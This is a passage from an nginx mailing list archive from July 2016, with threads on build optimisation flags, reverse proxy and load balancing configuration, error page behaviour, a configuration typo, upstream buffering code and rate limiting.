290-310 req/s with cached > Node/Express app on my laptop. > > Is it safe to use -O3 or -Ofast flags with Nginx? > > Is it possible to build Nginx with clang? If so, should I symlink it to > gcc (I use Docker, this way gcc executable is trashed) or is there a way to > define the compiler with a flag? > -------------- next part -------------- An HTML attachment was scrubbed... URL: From vbart at nginx.com Fri Jul 8 13:20:58 2016 From: vbart at nginx.com (Valentin V. Bartenev) Date: Fri, 08 Jul 2016 16:20:58 +0300 Subject: Optimization flags In-Reply-To: References: Message-ID: <3482025.ZJ7sBQaieg@vbart-workstation> On Friday 08 July 2016 14:44:00 Lantos Istv?n wrote: > The default --with-cc-opt flags for Nginx are these: > > *--with-cc-opt='-g -O2 -fstack-protector-strong -Wformat > > -Werror=format-security -Wp,-D_FORTIFY_SOURCE=2'* > > > > However I added more optimizations, which are against the standard: > > *--with-cc-opt='-g -Ofast -march=native -ffast-math > > -fstack-protector-strong -Wformat -Werror=format-security > > -Wp,-D_FORTIFY_SOURCE=2'* > > > > So far I don't experience any bug, but I do have a higher benchmark: > 380-450 req/s compared to the original 290-310 req/s with cached > Node/Express app on my laptop. > > Is it safe to use -O3 or -Ofast flags with Nginx? Usually it is safe. You can run tests: http://hg.nginx.org/nginx-tests/ > > Is it possible to build Nginx with clang? If so, should I symlink it to gcc > (I use Docker, this way gcc executable is trashed) or is there a way to > define the compiler with a flag? --with-cc= wbr, Valentin V. Bartenev From kerozin.joe at gmail.com Fri Jul 8 13:22:11 2016 From: kerozin.joe at gmail.com (=?UTF-8?Q?Lantos_Istv=C3=A1n?=) Date: Fri, 8 Jul 2016 15:22:11 +0200 Subject: Optimization flags In-Reply-To: <3482025.ZJ7sBQaieg@vbart-workstation> References: <3482025.ZJ7sBQaieg@vbart-workstation> Message-ID: Thank You! 2016-07-08 15:20 GMT+02:00 Valentin V. Bartenev : > On Friday 08 July 2016 14:44:00 Lantos Istv?n wrote: > > The default --with-cc-opt flags for Nginx are these: > > > > *--with-cc-opt='-g -O2 -fstack-protector-strong -Wformat > > > -Werror=format-security -Wp,-D_FORTIFY_SOURCE=2'* > > > > > > > However I added more optimizations, which are against the standard: > > > > *--with-cc-opt='-g -Ofast -march=native -ffast-math > > > -fstack-protector-strong -Wformat -Werror=format-security > > > -Wp,-D_FORTIFY_SOURCE=2'* > > > > > > > So far I don't experience any bug, but I do have a higher benchmark: > > 380-450 req/s compared to the original 290-310 req/s with cached > > Node/Express app on my laptop. > > > > Is it safe to use -O3 or -Ofast flags with Nginx? > > Usually it is safe. You can run tests: http://hg.nginx.org/nginx-tests/ > > > > > Is it possible to build Nginx with clang? If so, should I symlink it to > gcc > > (I use Docker, this way gcc executable is trashed) or is there a way to > > define the compiler with a flag? > > --with-cc= > > wbr, Valentin V. Bartenev > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From kerozin.joe at gmail.com Fri Jul 8 21:10:04 2016 From: kerozin.joe at gmail.com (=?UTF-8?Q?Lantos_Istv=C3=A1n?=) Date: Fri, 8 Jul 2016 23:10:04 +0200 Subject: Optimization flags In-Reply-To: References: <3482025.ZJ7sBQaieg@vbart-workstation> Message-ID: I made a non-scientific benchmark on my laptop with my project. Although jumping from -O2 to -Ofast giving me dramatic speed boost, it's interesting to see that going from gcc-4.9 to clang-3.9, there's no difference, just margin of error. The test is non-scientific, I worked on my PC at midday on raw pictures, lots of programs open, but still, those readings almost identical. My verdict is there's no reason to introduce clang into my Docker build, because doesn't make any speed difference. Going from -O2 to -Ofast makes. 290-310req/s vs 380-450 req/s. 2016-07-08 15:22 GMT+02:00 Lantos Istv?n : > Thank You! > > 2016-07-08 15:20 GMT+02:00 Valentin V. Bartenev : > >> On Friday 08 July 2016 14:44:00 Lantos Istv?n wrote: >> > The default --with-cc-opt flags for Nginx are these: >> > >> > *--with-cc-opt='-g -O2 -fstack-protector-strong -Wformat >> > > -Werror=format-security -Wp,-D_FORTIFY_SOURCE=2'* >> > > >> > >> > However I added more optimizations, which are against the standard: >> > >> > *--with-cc-opt='-g -Ofast -march=native -ffast-math >> > > -fstack-protector-strong -Wformat -Werror=format-security >> > > -Wp,-D_FORTIFY_SOURCE=2'* >> > > >> > >> > So far I don't experience any bug, but I do have a higher benchmark: >> > 380-450 req/s compared to the original 290-310 req/s with cached >> > Node/Express app on my laptop. >> > >> > Is it safe to use -O3 or -Ofast flags with Nginx? >> >> Usually it is safe. You can run tests: http://hg.nginx.org/nginx-tests/ >> >> > >> > Is it possible to build Nginx with clang? If so, should I symlink it to >> gcc >> > (I use Docker, this way gcc executable is trashed) or is there a way to >> > define the compiler with a flag? >> >> --with-cc= >> >> wbr, Valentin V. Bartenev >> >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx >> > > -------------- next part -------------- An HTML attachment was scrubbed... URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: clang-vs-gcc.png Type: image/png Size: 54606 bytes Desc: not available URL: From nginx-forum at forum.nginx.org Fri Jul 8 21:55:04 2016 From: nginx-forum at forum.nginx.org (ZaneCEO) Date: Fri, 08 Jul 2016 17:55:04 -0400 Subject: Issue with HTTP/2 and async file upload from Safari on iOS In-Reply-To: References: Message-ID: Hi guys, that's the issue for me: I'm with Ubuntu 16.04 official packages. I apt dist-upgrade, but still I'm on nginx/1.10.0.. Any solution other than switching to https://launchpad.net/~nginx/+archive/ubuntu/development (wich scares the skull out of me, since this is a production server)? Posted at Nginx Forum: https://forum.nginx.org/read.php?2,267385,268204#msg-268204 From nginx-forum at forum.nginx.org Fri Jul 8 22:35:26 2016 From: nginx-forum at forum.nginx.org (itpp2012) Date: Fri, 08 Jul 2016 18:35:26 -0400 Subject: Issue with HTTP/2 and async file upload from Safari on iOS In-Reply-To: References: Message-ID: <2d76d90751234e0f9a157d8b92915669.NginxMailingListEnglish@forum.nginx.org> You can manually apply the patches and recompile. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,267385,268205#msg-268205 From luky-37 at hotmail.com Sat Jul 9 10:25:50 2016 From: luky-37 at hotmail.com (Lukas Tribus) Date: Sat, 9 Jul 2016 10:25:50 +0000 Subject: AW: Issue with HTTP/2 and async file upload from Safari on iOS In-Reply-To: References: , Message-ID: > Any solution other than switching to > https://launchpad.net/~nginx/+archive/ubuntu/development (wich scares the > skull out of me, since this is a production server)? Use nginx provided binaries if compiling from source is not an option: http://nginx.org/en/linux_packages.html#mainline From nginx-forum at forum.nginx.org Sat Jul 9 15:23:41 2016 From: nginx-forum at forum.nginx.org (bai030805) Date: Sat, 09 Jul 2016 11:23:41 -0400 Subject: Set up reverse proxy and loadbalancing without hostname Message-ID: Hi Gurus My lab environment is Nginx IP: 192.168.16.206 Four Web Server: 192.168.16.201-204 My nginx.conf is http { upstream myapp1 { server 192.168.16.201; server 192.168.16.202; server 192.168.16.203; server 192.168.16.204; } server { listen 80; location / { proxy_pass http://myapp1; } } } from web brower, i use http://192.168.16.206 to access the web server. the web brower redirect "http://192.168.16.206" to "https://myapp1/" then i got error "myapp1?s server DNS address could not be found." error. Could you please give me some suggestions about this? thanks so much for your feedback. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268209,268209#msg-268209 From dewanggaba at xtremenitro.org Sat Jul 9 15:28:44 2016 From: dewanggaba at xtremenitro.org (Dewangga Alam) Date: Sat, 9 Jul 2016 22:28:44 +0700 Subject: Set up reverse proxy and loadbalancing without hostname In-Reply-To: References: Message-ID: <5a1d1743-8841-02f3-e712-77e24387695c@xtremenitro.org> Hello! On 7/9/2016 10:23 PM, bai030805 wrote: > Hi Gurus > > My lab environment is > > Nginx IP: 192.168.16.206 > Four Web Server: 192.168.16.201-204 > > My nginx.conf is > > http { > upstream myapp1 { > server 192.168.16.201; > server 192.168.16.202; > server 192.168.16.203; > server 192.168.16.204; > } > server { > listen 80; > location / { > proxy_pass http://myapp1; > } > } > } Have you tried using `proxy_redirect off;` under your proxy_pass configuration? > > from web brower, i use http://192.168.16.206 to access the web server. the > web brower redirect "http://192.168.16.206" to "https://myapp1/" > then i got error "myapp1?s server DNS address could not be found." error. > > Could you please give me some suggestions about this? thanks so much for > your feedback. > > Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268209,268209#msg-268209 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > From francis at daoine.org Sat Jul 9 16:26:32 2016 From: francis at daoine.org (Francis Daly) Date: Sat, 9 Jul 2016 17:26:32 +0100 Subject: Set up reverse proxy and loadbalancing without hostname In-Reply-To: References: Message-ID: <20160709162632.GM12280@daoine.org> On Sat, Jul 09, 2016 at 11:23:41AM -0400, bai030805 wrote: Hi there, > Nginx IP: 192.168.16.206 > Four Web Server: 192.168.16.201-204 Is there one Host: header that you can send in requests to each of the four web servers, so that they will all return the content that you want? If so, use that. If not, send none. That is... > location / { > proxy_pass http://myapp1; nginx will make a request of the upstream server including "Host: myapp1". You can change that by using "proxy_set_header Host" with your preferred name. (Or you can use that name instead of "myapp1" here, and in the "upstream" definition.) Possibly proxy_set_header Host ""; is what you want here. Depending on what your upstream servers send, you may need more config in nginx to get everything to work the way that you want it to. > } > } > > from web brower, i use http://192.168.16.206 to access the web server. the > web brower redirect "http://192.168.16.206" to "https://myapp1/" If there really is a switch from http to https, that suggests that something extra is happening. What response do you get from curl -v -H Host:myapp1 http://192.168.16.201/ ? Because that is more-or-less the request than nginx makes. Good luck with it, f -- Francis Daly francis at daoine.org From pratyush at hostindya.com Sat Jul 9 17:51:53 2016 From: pratyush at hostindya.com (Pratyush Kumar) Date: Sat, 09 Jul 2016 17:51:53 +0000 Subject: Set up reverse proxy and loadbalancing without hostname In-Reply-To: <20160709162632.GM12280@daoine.org> References: <20160709162632.GM12280@daoine.org> Message-ID: Hi there try this http { upstream myapp1 { server 192.168.16.201; server 192.168.16.202; server 192.168.16.203; server 192.168.16.204; } server { listen 80; location / { proxy_pass http://myapp1/; proxy_set_header Host $host; #proxy_redirect https://myapp1/ http://$host/; } } } Basically "proxy_set_header Host $host;" is passing the host name as seen by nginx to the upstream servers, so any redirect originating at upstream will redirect to the same host which it was called with. without this statement upstream servers sees host name as myapp1 which nginx uses to request them. If this one doesn't work as expected you might like to un-comment "#proxy_redirect https://myapp1 (https://myapp1/) http://$host/;" line, although in my opinion it wont be necessary. Regards Pratyush Kumar http://erpratyush.me (http://erpratyush.me) live and let live go vegan July 9 2016 9:56 PM, "Francis Daly" wrote:On Sat, Jul 09, 2016 at 11:23:41AM -0400, bai030805 wrote: Hi there, Nginx IP: 192.168.16.206 Four Web Server: 192.168.16.201-204 Is there one Host: header that you can send in requests to each of the four web servers, so that they will all return the content that you want? If so, use that. If not, send none. That is... location / { proxy_pass http://myapp1 (http://myapp1); nginx will make a request of the upstream server including "Host: myapp1". You can change that by using "proxy_set_header Host" with your preferred name. (Or you can use that name instead of "myapp1" here, and in the "upstream" definition.) Possibly proxy_set_header Host ""; is what you want here. Depending on what your upstream servers send, you may need more config in nginx to get everything to work the way that you want it to. } } from web brower, i use http://192.168.16.206 to access the web server. the web brower redirect "http://192.168.16.206" to "https://myapp1 (https://myapp1)" If there really is a switch from http to https, that suggests that something extra is happening. What response do you get from curl -v -H Host:myapp1 http://192.168.16.201/ ? Because that is more-or-less the request than nginx makes. Good luck with it, f -- Francis Daly francis at daoine.org (mailto:francis at daoine.org) _______________________________________________ nginx mailing list nginx at nginx.org (mailto:nginx at nginx.org) http://mailman.nginx.org/mailman/listinfo/nginx (http://mailman.nginx.org/mailman/listinfo/nginx) -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at forum.nginx.org Sun Jul 10 14:41:07 2016 From: nginx-forum at forum.nginx.org (bai030805) Date: Sun, 10 Jul 2016 10:41:07 -0400 Subject: Set up reverse proxy and loadbalancing without hostname In-Reply-To: References: Message-ID: Hi All thanks so much for your help!!! Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268209,268228#msg-268228 From nginx-forum at forum.nginx.org Mon Jul 11 08:25:07 2016 From: nginx-forum at forum.nginx.org (ZaneCEO) Date: Mon, 11 Jul 2016 04:25:07 -0400 Subject: AW: Issue with HTTP/2 and async file upload from Safari on iOS In-Reply-To: References: Message-ID: @itpp2012 : building from source is a no-go for me due to future upgrade concerns @Lukas : will follow your suggestion and try the ngingx-provided bins, thanks! Posted at Nginx Forum: https://forum.nginx.org/read.php?2,267385,268236#msg-268236 From nginx-forum at forum.nginx.org Mon Jul 11 13:40:45 2016 From: nginx-forum at forum.nginx.org (leeand00) Date: Mon, 11 Jul 2016 09:40:45 -0400 Subject: Insert Variable Values when loading a Cloud Config? Message-ID: <4dd49d1c98803d2de518907148bfcd0a.NginxMailingListEnglish@forum.nginx.org> I asked a question on another site (http://stackoverflow.com/questions/37032806/does-bare-metal-coreos-etcd2-support-the-templating-feature-of-coreos-cloudinit) about loading a cloud config from nginx onto a bare-metal core-os machine. The question involves trying to have nginx fill in the variables for the $private_ipv4 and $public_ipv4 when a config is loaded up. Does this require that I use php-fpm to somehow recognize the machine sending the request, and then fill in the variables when the cloud-config is requested? Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268241,268241#msg-268241 From nginx-forum at forum.nginx.org Mon Jul 11 16:34:13 2016 From: nginx-forum at forum.nginx.org (matt_l) Date: Mon, 11 Jul 2016 12:34:13 -0400 Subject: One goal. 2 settings. Which one would you recommend? Message-ID: <940a78d1eb43551aa11b11ff74a56799.NginxMailingListEnglish@forum.nginx.org> Hi I am debating what is a better setting between the 2 settings below. Setting#1 and Setting#2 attempt to do the same task (flow control by controlling the IP sources). Setting#1 uses one machine and Setting#2 uses 2 machines in a cascading manner. Thank you for your help 1. Setting #1 1 machine with N CPU =========================== [...] upstream dynamic { least_conn; server XXX.XXX.XXX.XXX:9990; [?] keepalive 5; } upstream locallayer { server 127.0.0.1:7999; keepalive 200; } limit_conn_zone $binary_remote_addr zone=peripconn:100m; limit_req_zone $binary_remote_addr zone=peripreq:1000m rate=30000r/s; server { listen 7999; server_name local.com; proxy_intercept_errors on; location / { limit_conn peripconn 160; limit_req zone=peripreq burst=100 nodelay; limit_conn_status 503; limit_req_status 503; proxy_http_version 1.1; proxy_set_header Connection ""; proxy_connect_timeout 10ms; proxy_send_timeout 10ms; proxy_read_timeout 60ms; proxy_pass http://dynamic; } error_page 302 400 403 404 408 500 502 503 504 = /empty; location /empty { return 204; } } server { listen 8002; proxy_intercept_errors on; location / { limit_conn peripex 5; limit_conn_status 503; proxy_http_version 1.1; proxy_set_header Connection ""; proxy_pass http://locallayer; } error_page 302 400 403 404 408 500 502 503 504 = /empty; location /empty { return 204; } } [...] 2. Setting #2 2 machines each N/2 CPU ============================== - Machine #1: [...] upstream machine2 { least_conn; server ip/of/machine2:7999; keepalive 200; } server { listen 8002; proxy_intercept_errors on; location / { limit_conn peripex 5; limit_conn_status 503; proxy_http_version 1.1; proxy_set_header Connection ""; proxy_pass http://machine2; } error_page 302 400 403 404 408 500 502 503 504 = /empty; location /empty { return 204; } } [...] - Machine #2: [...] upstream dynamic { least_conn; server XXX.XXX.XXX.XXX:9990; [?] keepalive 5; } limit_conn_zone $binary_remote_addr zone=peripconn:100m; limit_req_zone $binary_remote_addr zone=peripreq:1000m rate=30000r/s; server { listen 7999; server_name local.com; proxy_intercept_errors on; location / { limit_conn peripconn 160; limit_req zone=peripreq burst=100 nodelay; limit_conn_status 503; limit_req_status 503; proxy_http_version 1.1; proxy_set_header Connection ""; proxy_connect_timeout 10ms; proxy_send_timeout 10ms; proxy_read_timeout 60ms; proxy_pass http://dynamic; } error_page 302 400 403 404 408 500 502 503 504 = /empty; location /empty { return 204; } } [...] Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268243,268243#msg-268243 From francis at daoine.org Mon Jul 11 18:31:06 2016 From: francis at daoine.org (Francis Daly) Date: Mon, 11 Jul 2016 19:31:06 +0100 Subject: Insert Variable Values when loading a Cloud Config? In-Reply-To: <4dd49d1c98803d2de518907148bfcd0a.NginxMailingListEnglish@forum.nginx.org> References: <4dd49d1c98803d2de518907148bfcd0a.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20160711183106.GN12280@daoine.org> On Mon, Jul 11, 2016 at 09:40:45AM -0400, leeand00 wrote: Hi there, > The question involves trying to have nginx fill in the variables for the > $private_ipv4 and $public_ipv4 when a config is loaded up. Does this > require that I use php-fpm to somehow recognize the machine sending the > request, and then fill in the variables when the cloud-config is requested? I think that the nginx side of the question is: A file exists on the filesystem. A request is made for the matching url. Can nginx return the file contents, making some textual substitutions in the file contents? If that is the question, then the answers probably involves: does nginx know what the desired substitutions are? (As in, where do the suitable values for $private_ipv4 and $public_ipv4 come from?) If nginx can know, then probably the sub_filter module (http://nginx.org/r/sub_filter) can help. You made need to check that you can include a literal $ in the string to replace, but that should be a straightforward enough test after you know that nginx can know what the replacement strings are. If sub_filter is not suitable, then you could use any other active content system (such as php-fpm) to do the work. The details will matter. Good luck with it, f -- Francis Daly francis at daoine.org From nginx at 2xlp.com Mon Jul 11 19:26:30 2016 From: nginx at 2xlp.com (Jonathan Vanasco) Date: Mon, 11 Jul 2016 15:26:30 -0400 Subject: forced 404 without a location display ? Message-ID: <6120616F-3CA5-4629-AABE-608D2E977A38@2xlp.com> I have some servers where I use an old method of gating a path by using a file check. this allows staff to turn off certain locations during migrations/updates without having root privileges (needed to restart nginx) an issue I noticed? this method now (perhaps always) shows the name of the location on the default 404 template [the response that nginx generates via code, not a template on the fs] Does anyone know how to disable showing the location without defining a custom template on the filesystem? or perhaps someone can think of a better way to accomplish my goals? location /paths/to/ { if (!-f /etc/nginx/_flags/is_running) { rewrite ^.*$ @is_running break; } } location = @is_running { return 404; } ======= that generates this 404 Not Found

404 Not Found

The resource could not be found.

/@is_running From oleg at mamontov.net Mon Jul 11 20:25:34 2016 From: oleg at mamontov.net (Oleg A. Mamontov) Date: Mon, 11 Jul 2016 23:25:34 +0300 Subject: forced 404 without a location display ? In-Reply-To: <6120616F-3CA5-4629-AABE-608D2E977A38@2xlp.com> References: <6120616F-3CA5-4629-AABE-608D2E977A38@2xlp.com> Message-ID: <20160711202534.GF19996@xenon.mamontov.net> On Mon, Jul 11, 2016 at 03:26:30PM -0400, Jonathan Vanasco wrote: > I have some servers where I use an old method of gating a path by using a file check. > > this allows staff to turn off certain locations during migrations/updates without having root privileges (needed to restart nginx) > > an issue I noticed? this method now (perhaps always) shows the name of the location on the default 404 template [the response that nginx generates via code, not a template on the fs] > > Does anyone know how to disable showing the location without defining a custom template on the filesystem? or perhaps someone can think of a better way to accomplish my goals? > > > > location /paths/to/ { > if (!-f /etc/nginx/_flags/is_running) { > rewrite ^.*$ @is_running break; > } > } > location = @is_running { > return 404; > } > > ======= > that generates this > > > > > 404 Not Found > > >

404 Not Found

> The resource could not be found.

> /@is_running > > > > ============================================= location /paths/to/ { if ( !-f /etc/nginx/_flags/is_running ) { rewrite ^ /is_running last; } } location = /is_running { internal; return 404 'nothing\n'; } ============================================= Does it work for you? -- Cheers, Oleg A. Mamontov mailto: oleg at mamontov.net skype: lonerr11 cell: +7 (903) 798-1352 From mdounin at mdounin.ru Mon Jul 11 20:27:57 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 11 Jul 2016 23:27:57 +0300 Subject: forced 404 without a location display ? In-Reply-To: <6120616F-3CA5-4629-AABE-608D2E977A38@2xlp.com> References: <6120616F-3CA5-4629-AABE-608D2E977A38@2xlp.com> Message-ID: <20160711202757.GI57459@mdounin.ru> Hello! On Mon, Jul 11, 2016 at 03:26:30PM -0400, Jonathan Vanasco wrote: > I have some servers where I use an old method of gating a path > by using a file check. > > this allows staff to turn off certain locations during > migrations/updates without having root privileges (needed to > restart nginx) > > an issue I noticed? this method now (perhaps always) shows the > name of the location on the default 404 template [the response > that nginx generates via code, not a template on the fs] > > Does anyone know how to disable showing the location without > defining a custom template on the filesystem? or perhaps > someone can think of a better way to accomplish my goals? > > > > location /paths/to/ { > if (!-f /etc/nginx/_flags/is_running) { > rewrite ^.*$ @is_running break; > } > } > location = @is_running { > return 404; > } > > ======= > that generates this > > > > > 404 Not Found > > >

404 Not Found

> The resource could not be found.

> /@is_running > > > > This is not something nginx generates. An nginx-generated error will look like: 404 Not Found

404 Not Found


nginx/1.11.3
No location information is added by nginx to error pages, and never was. You are probably using something with 3rd party patches. An obvious fix is to switch to using vanilla nginx instead, it can be downloaded here: http://nginx.org/en/download.html -- Maxim Dounin http://nginx.org/ From nginx-forum at forum.nginx.org Tue Jul 12 01:24:11 2016 From: nginx-forum at forum.nginx.org (leeand00) Date: Mon, 11 Jul 2016 21:24:11 -0400 Subject: Insert Variable Values when loading a Cloud Config? In-Reply-To: <20160711183106.GN12280@daoine.org> References: <20160711183106.GN12280@daoine.org> Message-ID: This is just a guess, but probably a hashap...or maybe a DNS server that assigns them statically. But I suppose CoreOS has to request it from nginx, so it could probably even just pull it out of the request. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268241,268250#msg-268250 From nginx-forum at forum.nginx.org Tue Jul 12 14:47:56 2016 From: nginx-forum at forum.nginx.org (reaper) Date: Tue, 12 Jul 2016 10:47:56 -0400 Subject: nginx not using root from location Message-ID: Hello. I'm obviously missing something but I'm not quite sure what. Here's one of my vhosts. server { listen 80; server_name test.local; access_log /var/log/nginx/access.log; root /data/www/htdocs/web; location / { index index.php; } location /testlocation { index index.html root /data/www/htdocs/test; } } When I try to get index.html from /testlocation I always get 404 with message in errorlog that file is missing in /data/www/htdocs/web. Why? Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268258,268258#msg-268258 From shivamnindrajog at gmail.com Tue Jul 12 16:46:43 2016 From: shivamnindrajog at gmail.com (Shivam Nanda) Date: Tue, 12 Jul 2016 22:16:43 +0530 Subject: nginx not using root from location In-Reply-To: References: Message-ID: Hi Reaper please check the following: 1. check the permissions of the folders. 2. define both root directive in the location. restart the nginx service and share the results. Thanks Shivam On 12 Jul 2016 20:18, "reaper" wrote: > Hello. I'm obviously missing something but I'm not quite sure what. > > Here's one of my vhosts. > > server { > listen 80; > server_name test.local; > > access_log /var/log/nginx/access.log; > > root /data/www/htdocs/web; > > location / { > index index.php; > } > > location /testlocation { > index index.html > root /data/www/htdocs/test; > } > } > > When I try to get index.html from /testlocation I always get 404 with > message in errorlog that file is missing in /data/www/htdocs/web. Why? > > Posted at Nginx Forum: > https://forum.nginx.org/read.php?2,268258,268258#msg-268258 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From francis at daoine.org Tue Jul 12 17:30:08 2016 From: francis at daoine.org (Francis Daly) Date: Tue, 12 Jul 2016 18:30:08 +0100 Subject: nginx not using root from location In-Reply-To: References: Message-ID: <20160712173008.GO12280@daoine.org> On Tue, Jul 12, 2016 at 10:47:56AM -0400, reaper wrote: Hi there, > Hello. I'm obviously missing something but I'm not quite sure what. You don't have a "root" directive inside the location. Your "index" directive as-written has three arguments, although you want it to only have one. > location /testlocation { > index index.html > root /data/www/htdocs/test; > } Add a semicolon to tell nginx that your "index" directive is complete. f -- Francis Daly francis at daoine.org From nginx-forum at forum.nginx.org Tue Jul 12 19:47:23 2016 From: nginx-forum at forum.nginx.org (reaper) Date: Tue, 12 Jul 2016 15:47:23 -0400 Subject: nginx not using root from location In-Reply-To: <20160712173008.GO12280@daoine.org> References: <20160712173008.GO12280@daoine.org> Message-ID: Yes! That was it. Thank you. Strange that nginx -t didn't say anything wrong with config :( Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268258,268261#msg-268261 From francis at daoine.org Tue Jul 12 20:11:02 2016 From: francis at daoine.org (Francis Daly) Date: Tue, 12 Jul 2016 21:11:02 +0100 Subject: nginx not using root from location In-Reply-To: References: <20160712173008.GO12280@daoine.org> Message-ID: <20160712201102.GP12280@daoine.org> On Tue, Jul 12, 2016 at 03:47:23PM -0400, reaper wrote: Hi there, > Yes! That was it. Thank you. Good stuff. > Strange that nginx -t didn't say anything wrong with config :( There's nothing wrong with the config. It is syntactically correct. When you request /testlocation/, nginx will look for the file /data/www/htdocs/web/testlocation/index.html, then the file /data/www/htdocs/web/testlocation/root, then the file /data/www/htdocs/web/data/www/htdocs/test, and then fail 404, which is exactly what you told it to do. The fact that that is not what you *wanted* to tell nginx to do, is not something that nginx can reliably guess. So it doesn't try. Cheers, f -- Francis Daly francis at daoine.org From francis at daoine.org Tue Jul 12 20:15:43 2016 From: francis at daoine.org (Francis Daly) Date: Tue, 12 Jul 2016 21:15:43 +0100 Subject: Insert Variable Values when loading a Cloud Config? In-Reply-To: References: <20160711183106.GN12280@daoine.org> Message-ID: <20160712201543.GQ12280@daoine.org> On Mon, Jul 11, 2016 at 09:24:11PM -0400, leeand00 wrote: Hi there, > This is just a guess, but probably a hashap...or maybe a DNS server that > assigns them statically. But I suppose CoreOS has to request it from nginx, > so it could probably even just pull it out of the request. When you can see what the request is, and what information it includes, and when you can see how nginx-or-something-else can take that information and determine the correct public and private addresses to use, then you may have enough information to configure sub_filter (or something else) to return the content that you want. Most of those missing pieces are not nginx-specific. There might be someone here who knows about them; but if they are CoreOS-specific, you may have better luck on a CoreOS list. Good luck with it, f -- Francis Daly francis at daoine.org From nginx at 2xlp.com Tue Jul 12 22:45:21 2016 From: nginx at 2xlp.com (Jonathan Vanasco) Date: Tue, 12 Jul 2016 18:45:21 -0400 Subject: forced 404 without a location display ? In-Reply-To: <20160711202757.GI57459@mdounin.ru> References: <6120616F-3CA5-4629-AABE-608D2E977A38@2xlp.com> <20160711202757.GI57459@mdounin.ru> Message-ID: On Jul 11, 2016, at 4:27 PM, Maxim Dounin wrote: > No location information is added by nginx to error pages, and > never was. You are probably using something with 3rd party > patches. An obvious fix is to switch to using vanilla nginx > instead, it can be downloaded here: On Jul 11, 2016, at 4:25 PM, Oleg A. Mamontov wrote: > ============================================= > location /paths/to/ { > if ( !-f /etc/nginx/_flags/is_running ) { > rewrite ^ /is_running last; > } > } > location = /is_running { > internal; > return 404 'nothing\n'; > } > ============================================= Thanks to you both! I spent way more time than I should tracking the issue. I finally figured it out. Details below: 1. I am using a non-standard nginx -- I run openresty. I thought this might have been the issue so started creating test-cases to pin down, and running against all the nginx & openresty versions. I could not consistently get this to repeat. 2. The first part of the problem is that I had `break` on my rewrite, instead of `last`. 3. The second part of my problem, and this is where the confusion happened -- a proxypass was involved Using `last`: what i wanted happened Using `break` the rewrite to `/is_running` got passed to the proxypass; the application was creating the error message the app's error message template was very similar to nginx -- and that threw me off i only figured this out, because nginx served an error when the application was taken offline during an update From nginx-forum at forum.nginx.org Thu Jul 14 03:09:47 2016 From: nginx-forum at forum.nginx.org (gaoyan09) Date: Wed, 13 Jul 2016 23:09:47 -0400 Subject: ngx_http_upstream_process_non_buffered_request recv question Message-ID: <61a43758f2ba6289f8b7bb06514da576.NginxMailingListEnglish@forum.nginx.org> size = b->end - b->last; if (size && upstream->read->ready) { n = upstream->recv(upstream, b->last, size); if (n == NGX_AGAIN) { break; } if (n > 0) { u->state->response_length += n; if (u->input_filter(u->input_filter_ctx, n) == NGX_ERROR) { ngx_http_upstream_finalize_request(r, u, NGX_ERROR); return; } } do_write = 1; continue; } Why not consider n==0 or n==NGX_ERROR as ngx_http_upstream_process_upgraded How handle it if upstream connection failed? Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268278,268278#msg-268278 From mdounin at mdounin.ru Thu Jul 14 13:00:28 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Thu, 14 Jul 2016 16:00:28 +0300 Subject: ngx_http_upstream_process_non_buffered_request recv question In-Reply-To: <61a43758f2ba6289f8b7bb06514da576.NginxMailingListEnglish@forum.nginx.org> References: <61a43758f2ba6289f8b7bb06514da576.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20160714130027.GS57459@mdounin.ru> Hello! On Wed, Jul 13, 2016 at 11:09:47PM -0400, gaoyan09 wrote: > size = b->end - b->last; > > if (size && upstream->read->ready) { > > n = upstream->recv(upstream, b->last, size); > > if (n == NGX_AGAIN) { > break; > } > > if (n > 0) { > u->state->response_length += n; > > if (u->input_filter(u->input_filter_ctx, n) == NGX_ERROR) { > ngx_http_upstream_finalize_request(r, u, NGX_ERROR); > return; > } > } > > do_write = 1; > > continue; > } > > Why not consider n==0 or n==NGX_ERROR as ngx_http_upstream_process_upgraded > How handle it if upstream connection failed? The upstream->read->eof and upstream->read->error flags are checked separately in the do_write code path, if there are no buffers to send downstream. -- Maxim Dounin http://nginx.org/ From nginx-forum at forum.nginx.org Thu Jul 14 13:20:44 2016 From: nginx-forum at forum.nginx.org (gaoyan09) Date: Thu, 14 Jul 2016 09:20:44 -0400 Subject: ngx_http_upstream_process_non_buffered_request recv question In-Reply-To: <20160714130027.GS57459@mdounin.ru> References: <20160714130027.GS57459@mdounin.ru> Message-ID: <6f331d320ba6ce2141904762eb48236f.NginxMailingListEnglish@forum.nginx.org> thx I see it. This do keep sending to client if upstream connection eof or error, only finalize request when u->busy_bufs == NULL, as all recv buffers had send to client Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268278,268288#msg-268288 From chadhansen at google.com Thu Jul 14 19:22:06 2016 From: chadhansen at google.com (Chad Hansen) Date: Thu, 14 Jul 2016 19:22:06 +0000 Subject: limit_req_zone key cache lifetime Message-ID: I'm looking for documentation or explanation for how keys expire in the limit_req_zone. I have the basic documenations here: *A client IP address serves as a key. Note that instead of $remote_addr, the $binary_remote_addr variable is used here. The $binary_remote_addr variable?s size is always 4 bytes for IPv4 addresses or 16 bytes for IPv6 addresses. The stored state always occupies 64 